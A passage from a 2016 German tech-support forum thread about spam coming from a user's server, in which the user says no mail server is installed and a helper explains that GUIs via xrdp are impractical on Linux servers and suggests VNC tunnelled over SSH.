__________________ Logfiles bitte immer in CODE-Tags posten Geändert von cosinus (14.09.2016 um 13:03 Uhr) |
14.09.2016, 14:14 | #13 |
| Spam von meinem Server! Werde ich checken sobald ich um 23uhr von der Arbeit zu Hause bin. |
15.09.2016, 23:34 | #14 |
| Spam von meinem Server! Sorry. Konnte mich jetzt erst darum kümmern. Weder Exim noch Postfix sind installiert. Mit Linux Desktop meine ich xrdp und per Windows Remote Desktop verbinden^^ Ich hatte es nur installiert um es mal auszutesten. Per Konsole ist es mir aber lieber. Ich komme mit der GUI nicht klar und irgendwie funktioniert die hälfte nicht^^ |
16.09.2016, 08:26 | #15 |
/// Winkelfunktion /// TB-Süch-Tiger™ | Spam von meinem Server! Ja, xrdp hatte ich auch mal angetestet. Funktioniert nicht richtig. Oder mir fehlen ein paar Hirnwindungen dafür So eine "grafische Administration" macht bei Linux aber eh kaum Sinn, denn Server haben meist keine GUI (keinen x11 installiert) Falls doch kann man es mit VNC ausprobieren, das durch SSH getunnelt wird. Man verbindet sich mit SSH über die Konsole und dann mit remmina oder einem anderen VNC-Client mit localhost
__________________ Logfiles bitte immer in CODE-Tags posten |
Themen zu Spam von meinem Server! |
accounts, control, controller, domain, e-mail, file, filename, forwarding, helft, lange, mail, meinem, microsoft, nicht, not, quellcode, required, schei, server, spam, spamassassin, tests, this, voll, windows |